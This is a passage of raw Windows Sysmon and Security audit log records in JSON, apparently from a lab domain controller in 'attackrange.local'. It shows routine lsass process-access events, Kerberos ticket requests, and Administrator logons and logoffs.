C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.822","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5479,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.822\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.822","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220569,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BDC8\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7bdc8","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220570,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BABB\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7babb","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220571,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80B00\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80b00","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5480,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220572,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220573,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7FF916DC-DFFB-DD6F-2100-4628BF43D695}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7FF916DC-DFFB-DD6F-2100-4628BF43D695}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220574,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7FF916DC-DFFB-DD6F-2100-4628BF43D695}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7FF916DC-DFFB-DD6F-2100-4628BF43D695}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220575,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80B5F\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7FF916DC-DFFB-DD6F-2100-4628BF43D695}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80b5f","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{7FF916DC-DFFB-DD6F-2100-4628BF43D695}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220576,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80B5F\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x80b5f","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5481,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 